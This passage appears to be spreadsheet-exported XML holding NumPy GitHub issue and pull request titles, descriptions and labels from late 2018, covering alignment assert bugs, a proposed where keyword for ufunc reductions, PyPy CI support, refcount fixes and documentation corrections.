    <t>Further correction to the debug assert statements in `lowlevel_stride_loops.c.src` to account for uint alignment, see #12618._x000D_
_x000D_
This also updates the unit test so it always fails if the alignment is incorrectly calculated, instead of sporadically failing depending on what malloc gives. That's done by making `_aligned_zeros` align to the requested alignment yet not twice the alignment._x000D_
_x000D_
The particular case that was failing was for 16-byte longdouble, which is 8-byte "uint aligned" but 16-byte "true aligned". (The copy-code copies 16-byte types with two uint64 assignments). So an 8-byte-aligned ptr would go into the uint aligned copy code, but would trip the 16-byte assert statement.</t>
  </si>
  <si>
    <t>BUG: fix uint alignment asserts in lowlevel loops</t>
  </si>
  <si>
    <t>Import of `numpy` on travis CI fails for `numpy-1.16.0rc1-py2.7-linux-x86_64.egg`_x000D_
_x000D_
```python_x000D_
    import numpy_x000D_
  File "/home/travis/virtualenv/pypy2.7-5.8.0/site-packages/numpy-1.16.0rc1-py2.7-linux-x86_64.egg/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/home/travis/virtualenv/pypy2.7-5.8.0/site-packages/numpy-1.16.0rc1-py2.7-linux-x86_64.egg/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/home/travis/virtualenv/pypy2.7-5.8.0/site-packages/numpy-1.16.0rc1-py2.7-linux-x86_64.egg/numpy/core/multiarray.py", line 44, in &lt;module&gt;_x000D_
    arange.__module__ = 'numpy'_x000D_
TypeError: readonly attribute_x000D_
```_x000D_
_x000D_
Failures started on `pypy` builds using the above noted rc of `numpy` on Dec 20 2018 or so: https://travis-ci.org/uqfoundation/mystic/jobs/474109434</t>
  </si>
  <si>
    <t>travis-ci fails for code that imports numpy 1.16.0rc1</t>
  </si>
  <si>
    <t xml:space="preserve">...Which, in fairness, is an edge case I should have guarded against myself. On the other hand, perhaps we could do some checking and toss a descriptive `ValueError` instead? I'm willing to write up a PR if that's an acceptable change._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
The following works with any shape, so long as any one of the axes is length 0:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
mmap = np.memmap('test.npy', shape=(0,4), mode='w+')_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/memmap.py", line 250, in __new___x000D_
    fid.seek(bytes - 1, 0)_x000D_
OSError: [Errno 22] Invalid argument_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.15.2 / 3.5.2_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.memmap throws OSError when size is zero</t>
  </si>
  <si>
    <t>Just a tiny fix since it reads as if descr can be NULL, but that is not valid.</t>
  </si>
  <si>
    <t>DOC: SimpleNewFromDescr cannot be given NULL for descr</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to install numpy by  _x000D_
pypy3 -m pip install numpy _x000D_
it didnt work , my os is windows _x000D_
is numpy supported on pypy3.5 windows yet?_x000D_
</t>
  </si>
  <si>
    <t>How can I install numpy for pypy3.5 on windows</t>
  </si>
  <si>
    <t xml:space="preserve">Bugfix to #6176 bool class from ctypes. _x000D_
It works for me but you should check it. </t>
  </si>
  <si>
    <t xml:space="preserve">BUG: Cannot convert boolean arrays to ctypes with ctypeslib </t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t>DOC: Minor fix to pocketfft release note</t>
  </si>
  <si>
    <t>Note: This is a simpler and more robust, yet faster, version of #12635 and #12640 (way too much time wasted on being clever, but the comments helped steer to this better solution)._x000D_
_x000D_
This introduces a `where` keyword for reductions. It works well, but for ufuncs with no identity, one has to explicitly pass in an `initial`. If people agree this is the way to go, I will add documentation and more tests._x000D_
_x000D_
Unlike for my other attempts, this performs quite well and I think we should consider using it in `nanfunctions` and in `MaskedArray`:_x000D_
```_x000D_
a = np.arange(100000.)_x000D_
a[1000] = np.nan_x000D_
np.add.reduce(a, where=~np.isnan(a)) == np.nansum(a)_x000D_
# True_x000D_
%timeit np.nansum(a)_x000D_
# 10000 loops, best of 5: 113 µs per loop_x000D_
%timeit np.add.reduce(a, where=~np.isnan(a))_x000D_
# 10000 loops, best of 5: 92.3 µs per loop_x000D_
_x000D_
# Now try what will be the worst-case scenario._x000D_
a[::2] = np.nan_x000D_
np.add.reduce(a, where=~np.isnan(a)) == np.nansum(a)_x000D_
# True_x000D_
%timeit np.nansum(a)_x000D_
# 1000 loops, best of 5: 381 µs per loop_x000D_
%timeit np.add.reduce(a, where=~np.isnan(a))_x000D_
# 1000 loops, best of 5: 389 µs per loop_x000D_
```</t>
  </si>
  <si>
    <t>ENH: where for ufunc reductions</t>
  </si>
  <si>
    <t xml:space="preserve">Run refguide-checker on public docstrings in `np.testing`, fix up examples (fixes are all mostly trivial)_x000D_
</t>
  </si>
  <si>
    <t>Doctest testing</t>
  </si>
  <si>
    <t>@seberg - here's an attempt where I force the iterator to feed an axis being reduced to the inner loop. Right now, it just does it, which causes a test failure that expects something else._x000D_
_x000D_
An advantage of this approach is that it is now more reasonable to ask people to provide `initial` for reductions that do not have an identity - it will now not be used to fill in masked items._x000D_
_x000D_
But it needs a better way to force the iterator to_x000D_
1. Always buffer the input;_x000D_
2. Ensure the external loop gets an axis that is being reduced over.</t>
  </si>
  <si>
    <t>ENH,WIP: alternative method to implement a where argument to ufunc reductions</t>
  </si>
  <si>
    <t>['01 - Enhancement', '25 - WIP', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Adding 12 to the [stress test for alignment](https://github.com/numpy/numpy/blob/master/numpy/core/tests/test_multiarray.py#L8003) is exposing bugs in the `assert` that the alignment is correct. PR #12626 is intended to fix the additional cases exposed in the stress test, but seems to have a problem:_x000D_
_x000D_
- it fixes the `asserts` where `sizeof(npy_longdouble) == 16` and its alignment is 8_x000D_
- it breaks the `asserts` where `sizeof(npy_longdouble) == 12` (32 bit linux) and its alignment is 4._x000D_
_x000D_
Note that the actual decision aligned/not aligned has not changed, only the `assert`s to check that everything is OK. Those `assert`s only fire when compiling with `-UNDEBUG` to undefine `NDEBUG` and allow the `assert` statements to work._x000D_
_x000D_
I propose we temporarily disable the asserts to allow work to continue, until #12626 can be merged.</t>
  </si>
  <si>
    <t>BUG: disable flaky sanity checks</t>
  </si>
  <si>
    <t>This introduces a `where` keyword for reductions - which would greatly help things like `MaskedArray`._x000D_
_x000D_
For lack of better ideas, the masking is done by setting elements that are not to be used to the identity. For this purposes, I have to ensure the operand reduced over is buffered - and this is now done with the drastic hack of (ab)using `NPY_ITER_READONLY|NPY_ITER_UPDATEIFCOPY` - I could not find a better way to tell the iterator to always buffer._x000D_
_x000D_
Work in progress - mostly here to request for comments, surely this can be done better...</t>
  </si>
  <si>
    <t>ENH/WIP: introduce a where keyword for reductions.</t>
  </si>
  <si>
    <t>Fixes #12492 _x000D_
_x000D_
There's simply no reason to explicitly set the `"agg"` matplotlib backend in our docstrings because we now use `refguide_check.py` that does this by default internally. They were needed when I was using vanilla `doctest` so my fault they got introduced as part of the superset of changes originally merged._x000D_
_x000D_
So, this PR removes all such cases I could find--about twice as many as Ralf noted in the linked issue. It is a little tricky because of the case insensitivity and `use` &amp; `switch_backend` can both be used. In short, this PR minimizes `git grep -i "Agg" | grep "matplotlib"` to the single case used in `refguide_check`._x000D_
_x000D_
We also have to be cautious that all docstrings touched here are actually executed by refguide to verify the changes--I confirmed this by breaking each one on purpose and confirming failure locally before removing `agg` setting.</t>
  </si>
  <si>
    <t>DOC, TST: remove "agg" setting from docs</t>
  </si>
  <si>
    <t>Continuation of gh-12624, I am not sure how much I will keep working on this. I think the changes should be mostly/all fine. But the error handlig is not improved, only the reference counting dirtily. So sometimes I am not sure if this might actually make things worse and `XDECREF` should be used at least._x000D_
_x000D_
A lot of this could probably simply use a bit of an audit and love..._x000D_
_x000D_
There is a single (probably) leak left in `test_compile_functions.py` after this, if I see it right.</t>
  </si>
  <si>
    <t>BUG: General fixes to f2py reference counts (dereferencing)</t>
  </si>
  <si>
    <t>['00 - Bug', '58 - Ready for review', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>I was trying to understand `nditer` better (with the idea of trying to implement a `where` keyword for reductions), and was surprised to find reference to items that do not actually seem to exist, in particular the `NPY_ITER_USE_MASKNA` flag and `NpyIter_GetMaskNAIndexArray` function.</t>
  </si>
  <si>
    <t>C-API documentation of nditer lists items that do not exist</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Add a NEP describing the design of the descriptor type, using a dtype metaclass._x000D_
_x000D_
The ideas is that we design a new dtype heirarchy to_x000D_
_x000D_
1. allow convenient expansion of the builtin dtypes_x000D_
1. ~eventually align the multiple class heirarchies of scalars and dtypes~_x000D_
1. modernize the codebase with more pythonic class layouts._x000D_
_x000D_
Very much a WIP, and I am not opposed to a totally different design that meets the goals_x000D_
_x000D_
My simple understanding of `1` is to design the classes with subclassing from python in mind, rather than adding new protocols, ~and that `2` means that instaniating an object from a dtype will create a scalar so that `type(np.int32(0)) is np.dtype('int32')`~._x000D_
_x000D_
Edit: 2. is not a goal</t>
  </si>
  <si>
    <t>WIP, NEP: add dtype design NEP</t>
  </si>
  <si>
    <t>Followup to #12611 to add a test for a 12-byte, 12-byte-aligned array._x000D_
_x000D_
I checked it crashes on x64 before #12611.</t>
  </si>
  <si>
    <t>MAINT: add test for 12-byte alignment</t>
  </si>
  <si>
    <t>Fixup cleanup of ufunc (definitely lost in valgrind). See also gh-12615, tested with valgrind and this seems all ufunc related lost memory right now.</t>
  </si>
  <si>
    <t>BUG: Add missing free in ufunc dealloc</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12611._x000D_
_x000D_
Fix #12607 _x000D_
_x000D_
It seems we hit an alignment assert on 32bit linux with longdouble dtype (which has elsize 12). Fix it in two stages (the first commit only extends CI to test asserts):_x000D_
_x000D_
1. Add `-UNDEBUG` to the `CFLAGS` so that the assert statements are checked (debug mode)_x000D_
2. Find and fix the underlying alignment issue_x000D_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</si>
  <si>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longdouble with elsize 12 is never uint alignable.</t>
  </si>
  <si>
    <t>See gh-12610 for details. Note, I removed this for TravisCI for now as a test, I want to see how big a problem we have for building from source at the moment.</t>
  </si>
  <si>
    <t>BLD: move -std=c99 addition to CFLAGS to Azure config</t>
  </si>
  <si>
    <t>@shoyer wrote a [draft NEP](https://hackmd.io/6YmDt_PgSVORRNRxHyPaNQ), I converted it to RST._x000D_
_x000D_
This is one of two NEPs, the second will describe migrating existing dtypes from instances of dtype to instances of type.</t>
  </si>
  <si>
    <t>WIP, NEP: draft dtype ufunc NEP</t>
  </si>
  <si>
    <t xml:space="preserve">See https://github.com/numpy/numpy/issues/12480 for discussion._x000D_
</t>
  </si>
  <si>
    <t>BLD: Fix minimum Python version in setup.py</t>
  </si>
  <si>
    <t xml:space="preserve">Most of this was already done, but we were still raising an error for_x000D_
declaration after a statement because the Windows Python 2.7 compiler_x000D_
did not allow it. We can fix this now as NumPy &gt;= 1.17 has dropped_x000D_
Python 2.7 support._x000D_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</si>
  <si>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Update `travis-test.sh` for C99</t>
  </si>
  <si>
    <t>Fix #12607 _x000D_
_x000D_
It seems we hit an alignment assert on 32bit linux with longdouble dtype (which has elsize 12). Fix it in two stages (the first commit only extends CI to test asserts):_x000D_
_x000D_
1. Add `-UNDEBUG` to the `CFLAGS` so that the assert statements are checked (debug mode)_x000D_
2. Find and fix the underlying alignment issue</t>
  </si>
  <si>
    <t>BUG: longdouble with elsize 12 is never uint alignable</t>
  </si>
  <si>
    <t xml:space="preserve">Prefix `-std=c99` to the CFLAGS environmental variable. C99 is the_x000D_
standard for NumPy &gt;= 1.17._x000D_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</si>
  <si>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Update runtests.py to specify C99 for gcc.</t>
  </si>
  <si>
    <t>~Relates to #2705, will fix it when deprecation warning is removed and readonly flag set. Replaces #11667.~_x000D_
_x000D_
As suggested in #11667 and in the code, the view returned from `broadcast_arrays` should be made `readonly`. ~set the `NPY_ARRAY_WARN_ON_WRITE` flag if the data is repeated across the array to fit the new shape.~ Currently we leave the `readonly` flag `False` which can lead to errors._x000D_
_x000D_
~An alternative would be to immediately set the `readonly` flag False, with no deprecation cycle. Advantages to the alternative path:~_x000D_
_x000D_
~- we are disrupting workflows anyway, we could do it only once instead of twice (once to filter the `DeprecationWarning`, once to remove the filter and handle the `readonly` change)~_x000D_
~- The current behavior is clearly wrong and will cause bugs if the returned arrays are written to.~_x000D_
_x000D_
I will solicit responses from the mailing list_x000D_
_x000D_
Edit: modified to set `NPY_ARRAY_WARN_ON_WRITE`_x000D_
_x000D_
Edit: modified to set a DeprecationWarning</t>
  </si>
  <si>
    <t>ENH: Deprecate writeable broadcast_array</t>
  </si>
  <si>
    <t>MAINT: Use `*.format` for some strings.</t>
  </si>
  <si>
    <t>Hello,_x000D_
when running the test suite on i386 wit python3.7 in the debug flavor we get this abort:_x000D_
_x000D_
```_x000D_
-- running tests for 3.7 debug --_x000D_
NumPy version 1.16.0rc1_x000D_
NumPy relaxed strides checking option: True_x000D_
============================= test session starts ==============================_x000D_
platform linux -- Python 3.7.2rc1, pytest-3.10.1, py-1.7.0, pluggy-0.8.0 -- /usr/bin/python3.7-dbg_x000D_
cachedir: .pytest_cache_x000D_
rootdir: /&lt;&lt;PKGBUILDDIR&gt;&gt;, inifile: pytest.ini_x000D_
collecting ... collected 7336 items / 167 deselected_x000D_
..._x000D_
tmp/usr/lib/python3/dist-packages/numpy/core/tests/test_multiarray.py::TestAlignment::test_various_alignments Aborted_x000D_
```_x000D_
_x000D_
could you have a look?_x000D_
_x000D_
thanks!</t>
  </si>
  <si>
    <t>1.6.0rc1 3.7 debug: test failure: test_multiarray.py::TestAlignment::test_various_alignments Aborted</t>
  </si>
  <si>
    <t>Rework of #12605</t>
  </si>
  <si>
    <t>DOC: Document NPY_SORTKIND parameter in PyArray_Sort</t>
  </si>
  <si>
    <t xml:space="preserve">…Sort_x000D_
_x000D_
Closes #12595_x000D_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</si>
  <si>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Adds missing parameter in Array C API documentation for PyArray_…</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</si>
  <si>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Similar to `fromstring` function, the `dtype` and `format` arguments of `fromfile` should be validated first to see that at least one of them is not None._x000D_
_x000D_
The following snippet shows the current behaviour_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
l50 = np.arange(100)_x000D_
fields_number = 10_x000D_
_x000D_
buffer = l50.tostring() * fields_number_x000D_
for file in ('test1.bin', ):_x000D_
    with open(file, 'w+b') as f:_x000D_
        f.write(buffer)_x000D_
np.core.records.fromfile('test1.bin')_x000D_
```_x000D_
```Traceback (most recent call last):_x000D_
  File "/home/daniel/.config/spyder-py3/temp.py", line 19, in &lt;module&gt;_x000D_
    print(np.core.records.fromfile('test1.bin')    )_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 762, in fromfile_x000D_
    descr = format_parser(formats, names, titles, aligned, byteorder)._descr_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 144, in __init___x000D_
    self._parseFormats(formats, aligned)_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 153, in _parseFormats_x000D_
    raise ValueError("Need formats argument")_x000D_
ValueError: Need formats argument_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: Check that dtype and formats arguments for None.</t>
  </si>
  <si>
    <t xml:space="preserve">Should fix these issues (screenshot below)._x000D_
_x000D_
&lt;img width="799" alt="screen shot 2018-12-23 at 00 08 08" src="https://user-images.githubusercontent.com/3019665/50380935-e28ed680-0646-11e9-8c96-33e49d31f7ba.png"&gt;_x000D_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</si>
  <si>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 xml:space="preserve">DOC: Fix markup in 1.16.0 release notes. </t>
  </si>
  <si>
    <t>DOC: Update RELEASE_WALKTHROUGH.rst.txt.</t>
  </si>
  <si>
    <t>DOC: Correct the doc of `obj` parameter of  in `numpy.delete`.</t>
  </si>
  <si>
    <t>DOC: Correct documentation of `numpy.delete` obj parameter.</t>
  </si>
  <si>
    <t>The number of CI tests we run on every PR has substantially increased recently. While there is no cost to us, all these tests do use power, which, at ~100 W times ~2 hr of processing time, is not negligible. We should try to minimize that, perhaps by doing first a single test before running the full suite (we use the travis scheme for this at astropy; not sure how it works for azure)._x000D_
_x000D_
Relatedly, we should document best practices, e.g., only push when tests pass locally, and for WIP where tests are know to fail, having options to avoid testing altogether._x000D_
_x000D_
p.s. I must admit I have little idea what the tests other than circle ci, azure, and coverage are good for...</t>
  </si>
  <si>
    <t>Reduce power consumption for testing</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', '15 - Discussion', 'component: Other']</t>
  </si>
  <si>
    <t xml:space="preserve">PR #12594 adds a PyPy3 run to our CI. The run fails tests, but is set up not to fail CI so as not to bother mainstream development._x000D_
_x000D_
Things that are known not to work on PyPY_x000D_
_x000D_
- [x] add_new_docs, see numpy #10167_x000D_
- [x] ctypes pep3118 format strings see pypy [#2930](https://bitbucket.org/pypy/pypy/issues/2930)_x000D_
</t>
  </si>
  <si>
    <t>ENH: tracking issue for PyPy support</t>
  </si>
  <si>
    <t>['01 - Enhancement', '23 - Wish List', '24 - PyPy']</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</si>
  <si>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 Description_x000D_
Further improve performance of numpy.core.records.fromarrays: _x000D_
* the arrays dtypes were converted to strings, and finally a new comma delimited string was created from those_x000D_
* the comma separated string was parsed in _format\_parser.\_parseFormats_ basically using regex to extract the formats basically undoing the first step_x000D_
* the new implementation avoids generating the comma separated string and instead creates the dtype using a list of (field name, field dtype) _x000D_
* added benchmark for records_x000D_
_x000D_
### benchmark_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [de28edd8]       [1d1fb908]_x000D_
     &lt;v1.15.4^0&gt;       &lt;master&gt;  _x000D_
-     6.79±0.04μs       5.72±0.2μs     0.84  bench_records.Records.time_fromstring_w_dtype_x000D_
-       177±0.4ms       69.5±0.3ms     0.39  bench_records.Records.time_fromarrays_w_dtype_x000D_
-         1.29±0s        111±0.6ms     0.09  bench_records.Records.time_fromarrays_formats_as_string_x000D_
-         1.30±0s       91.1±0.3ms     0.07  bench_records.Records.time_fromarrays_wo_dtype_x000D_
-      1.28±0.01s       86.0±0.4ms     0.07  bench_records.Records.time_fromarrays_formats_as_list_x000D_
-      1.12±0.01s       41.4±0.2ms     0.04  bench_records.Records.time_fromstring_formats_as_string_x000D_
-      1.12±0.01s       16.8±0.2ms     0.01  bench_records.Records.time_fromstring_formats_as_list_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>ENH: improve performance of numpy.core.records.fromarrays</t>
  </si>
  <si>
    <t>Documentation says PyArray_Sort takes two arguments, but actually it requires 3 arguments._x000D_
Signature in docs:_x000D_
(https://docs.scipy.org/doc/numpy-1.15.0/reference/c-api.array.html)_x000D_
```_x000D_
PyObject* PyArray_Sort(PyArrayObject* self, int axis)_x000D_
```_x000D_
Actual signature:_x000D_
```_x000D_
int PyArray_Sort(PyArrayObject *, int, NPY_SORTKIND)_x000D_
```</t>
  </si>
  <si>
    <t xml:space="preserve">Array C API documentation for PyArray_Sort missing parameter </t>
  </si>
  <si>
    <t>This PR adds testing for PyPy to our CI. I chose to use the latest nightly rather than a stable release since PyPy will be fixing test failures between releases._x000D_
_x000D_
We should also add a benchmark run at some point._x000D_
_x000D_
Things that are known not to work on PyPY_x000D_
_x000D_
- [x] add_new_docs, see numpy #10167 Edit: skipped these tests_x000D_
- [x] ctypes pep3118 format strings see pypy [#2930](https://bitbucket.org/pypy/pypy/issues/2930)_x000D_
_x000D_
~I have forced the test script to return 0 so CI does not fail even though there are failing tests~_x000D_
_x000D_
Edit: PyPy latests nightly HEAD passes all tests except the ones that modify docstrings in C</t>
  </si>
  <si>
    <t>DEV, BUILD: add pypy3 to azure CI</t>
  </si>
  <si>
    <t>['01 - Enhancement', '16 - Development', '24 - PyPy']</t>
  </si>
  <si>
    <t>This might make it easier for users to implement `__array_ufunc__` with custom casting behavior._x000D_
_x000D_
The motivation for this was to be able to deprecate the broken casting behavior in `np.clip`, without resorting to inspecting error strings._x000D_
This also removes the need for gh-12178_x000D_
Before:_x000D_
```_x000D_
&gt;&gt;&gt; np.add(1, 1, out=np.empty((), str), casting='safe')_x000D_
TypeError: Cannot cast ufunc add output from dtype('&lt;U1') to dtype('int32') with casting rule 'safe'_x000D_
&gt;&gt;&gt; np.less(1, 'a', dtype=int)_x000D_
TypeError: Cannot cast ufunc less input from dtype('&lt;U1') to dtype('int32') with casting rule 'same_kind'_x000D_
&gt;&gt;&gt; np.add(1, 'a')_x000D_
TypeError: ufunc 'add' did not contain a loop with signature matching types dtype('&lt;U11') dtype('&lt;U11') dtype('&lt;U11')_x000D_
```_x000D_
After, showing types, input/output argument numbers, and `-&gt;` in the signature:_x000D_
```_x000D_
&gt;&gt;&gt; np.add(1, 1, out=np.empty((), str), casting='safe')_x000D_
UFuncOutputCastingTypeError: Cannot cast ufunc 'add' output from dtype('&lt;U1') to dtype('int32') with casting rule 'safe'_x000D_
&gt;&gt;&gt; np.less(1, 'a', dtype=int)_x000D_
UFuncInputCastingTypeError: Cannot cast ufunc 'less' input 1 from dtype('&lt;U1') to dtype('int32') with casting rule 'same_kind'_x000D_
&gt;&gt;&gt; np.add(1, 'a')_x000D_
UFuncNoLoopTypeError: ufunc 'add' did not contain a loop with signature matching types (dtype('&lt;U11'), dtype('&lt;U11')) -&gt; dtype('&lt;U11')_x000D_
```_x000D_
_x000D_
Needs some more thought about the distinction between these error types._x000D_
_x000D_
One option would be to pretend that all the types are `TypeError` by setting `__name__`._x000D_
_x000D_
---_x000D_
_x000D_
[Mailing list discussion](http://numpy-discussion.10968.n7.nabble.com/Adding-more-detailed-exception-types-to-numpy-td46591.html)</t>
  </si>
  <si>
    <t>ENH,WIP: Use richer exception types for ufunc type resolution errors</t>
  </si>
  <si>
    <t>Example behavior:_x000D_
_x000D_
    &gt;&gt;&gt; x = np.array([1, 2, 3])_x000D_
    &gt;&gt;&gt; y = np.array([1, 2, 3.0001])_x000D_
    &gt;&gt;&gt; np.testing.assert_allclose(x, y)_x000D_
    AssertionError:_x000D_
    Not equal to tolerance rtol=1e-07, atol=0_x000D_
_x000D_
    Mismatch: 33.3%_x000D_
    Max absolute difference: 0.0001_x000D_
    Max relative difference: 3.33322223e-05_x000D_
     x: array([1, 2, 3])_x000D_
     y: array([1.    , 2.    , 3.0001])_x000D_
_x000D_
Motivation: when writing numerical algorithms, I frequently find myself experimenting to pick the right value of `atol` and `rtol` for `np.testing.assert_allclose()`. If I make the tolerance too generous, I risk missing regressions in accuracy, so I usually try to pick the smallest values for which tests pass. This change immediately reveals appropriate values to use for these parameters, so I don't need to guess and check._x000D_
_x000D_
If others like this idea, I will run it by the mailing list.</t>
  </si>
  <si>
    <t>ENH: add "max difference" messages to np.testing.assert_array_equal</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.16.0-changelog.rst_x000D_
- Prepare 1.16.0-notes.rst_x000D_
- Update tools/changelog.py for Python 3._x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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MAINT: Prepare for 1.16.0rc1 release.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', '14 - Release', '25 - WIP']</t>
  </si>
  <si>
    <t xml:space="preserve">- Don't use UTF8Writer in Python 3._x000D_
~- Don't use print() for blank lines.~_x000D_
_x000D_
This is left compatible with Python 2 as someone may use it with_x000D_
that version and there is no need to force the change._x000D_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</si>
  <si>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Update changelog.py for Python 3.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: Other']</t>
  </si>
  <si>
    <t>`PyArray_DESCR_REPLACE(descr)` is a macro that calls `PyArray_DescrNew`. Since `PyArray_DescrNew` can error, we must check the return value._x000D_
_x000D_
Refactored out of #12430</t>
  </si>
  <si>
    <t>BUG: check for errors after PyArray_DESCR_REPLACE</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12572._x000D_
_x000D_
We do this by going through ctypes.from_buffer, which keeps the object_x000D_
the buffer came from alive._x000D_
_x000D_
Fixes #9647_x000D_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</si>
  <si>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Make `arr.ctypes.data` hold a reference to the underlying array.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t>Clarify skiprows in loadtxt</t>
  </si>
  <si>
    <t xml:space="preserve"> Add a test that fails before, passes after #12577 on Linux_x000D_
_x000D_
Edit: qualify "passes" with Linux_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>TST: add test for 'python -mnumpy.f2py'</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Closes gh-12576</t>
  </si>
  <si>
    <t>BUG: fix f2py pep338 execution method</t>
  </si>
  <si>
    <t>Adjusted the shippable yml config file to run ARMv8 CI on all PRs to all `maintenance/*` branches. This was [requested](https://github.com/numpy/numpy/pull/12573#issuecomment-447712458) by @charris with impending `1.16rc` workflow / activity._x000D_
_x000D_
The changes here are based on the [official shippable docs for branches](http://docs.shippable.com/platform/workflow/config/#branches) &amp; the example yml file above that._x000D_
_x000D_
I guess we won't really know for sure until we try the changes though.</t>
  </si>
  <si>
    <t>TST: activate shippable maintenance branches</t>
  </si>
  <si>
    <t xml:space="preserve">- https://bugs.python.org/issue35507_x000D_
- https://stackoverflow.com/q/53757856/812183_x000D_
</t>
  </si>
  <si>
    <t>BUG: fix segfault in ctypeslib with obj being collected</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I would like numpy has a rms function built in._x000D_
### Something like this:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.array([1,2,3,4]_x000D_
np.rms(a)_x000D_
```</t>
  </si>
  <si>
    <t>ENH: RMS function</t>
  </si>
  <si>
    <t>['01 - Enhancement', '23 - Wish List']</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</si>
  <si>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The old implementation used a slower algorithm that only used lists and sublists to search for duplicates. By using an _OrderedDict_ the function executes much faster and the output is identical to the old implementation._x000D_
</t>
  </si>
  <si>
    <t>ENH: improve performance for numpy.core.records.find_duplicate</t>
  </si>
  <si>
    <t>PR #12524 introduced a refcount issue. Changing the interface to `PyUFuncOverride_GetOutObjects` so that `*out_kwd_obj` is never a borrowed reference should fix it.</t>
  </si>
  <si>
    <t>BUG: fix refcount issue caused by #12524</t>
  </si>
  <si>
    <t>Rework of #11721, re-reverting #12571, and now passing tests again</t>
  </si>
  <si>
    <t>BUG: Make `arr.ctypes.data` hold a reference to the underlying array</t>
  </si>
  <si>
    <t xml:space="preserve">This reverts commit 7ce7382d5eacbc3da026289483a841184a609928, reversing_x000D_
changes made to c52543e4a7d2ab5d1ae4be7364c51965dc4fdb9e._x000D_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</si>
  <si>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Revert "Merge pull request #11721 from eric-wieser/fix-9647"</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12511._x000D_
_x000D_
The copy-loops shouldn't assert pointer alignment for size-0 arrays, especially when RELAXED_STRIDES is turned on._x000D_
_x000D_
Fixes #12503_x000D_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</si>
  <si>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don't check alignment size=0 arrays (RELAXED_STRIDES)</t>
  </si>
  <si>
    <t>Previously this would show `b'first_line\nsecond_line'`_x000D_
_x000D_
Trivially backportable by the web interface.</t>
  </si>
  <si>
    <t>BUG: Make new-lines in compiler error messages print to the console</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of 12524._x000D_
In running tests on PyPy, there were failures due to improper use of the C-API:_x000D_
- Calling `InitOperators` to initialize the generated `ufuncs` before calling `PyType_Ready(PyUFunc_Type)`_x000D_
- Using the `PySequence_Fast*` functions before calling [`PySequence_Fast`](https://docs.python.org/3.6/c-api/sequence.html#c.PySequence_Fast) which works on CPython but does not always work on PyPy_x000D_
_x000D_
We could prevent these mistakes by getting PyPy into our CI testing, but there are still test failures due to _x000D_
- insufficient ctypes and memoryview support in PyPy_x000D_
- late writing docstrings into types and objects via `_multiarray_umath.add_docstring`_x000D_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</si>
  <si>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 xml:space="preserve">BUG: fix improper use of C-API </t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', '24 - PyPy']</t>
  </si>
  <si>
    <t>An attempt to influence #12520. Since the offending commit was 24c9faa, I tried reverting the logic in that commit.</t>
  </si>
  <si>
    <t>BUG: reorder operations for VS2015</t>
  </si>
  <si>
    <t>['00 - Bug', '26 - Compiler', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12527._x000D_
_x000D_
As reported on https://discuss.lgtm.com/t/analysis-fails-something-about-python3-5/1606, integration with lgtm.com C/C++ analysis is currently broken. This PR attempts to fix it by invoking Python 3 where the lgtm.com autobuild system would invoke Python 2 by default._x000D_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</si>
  <si>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Fix lgtm.com C/C++ build</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', '08 - Backport']</t>
  </si>
  <si>
    <t>I happened to notice unsafe code which attempts to access index 0 of a tuple with size 0._x000D_
_x000D_
It could cause a segfault if the tuple is at the end of a memory page, I guess. Not sure how to write a test though since I can't get that to happen easily.</t>
  </si>
  <si>
    <t>BUG: fix an unsafe PyTuple_GET_ITEM call</t>
  </si>
  <si>
    <t>[ci skip]_x000D_
_x000D_
I noticed some other docs on structured-arrays and multifield-views that should be updated given the changes in 1.16.</t>
  </si>
  <si>
    <t>DOC: more doc updates for structured arrays</t>
  </si>
  <si>
    <t xml:space="preserve">The current Python version is 3.6, which is too specific. I got caught by_x000D_
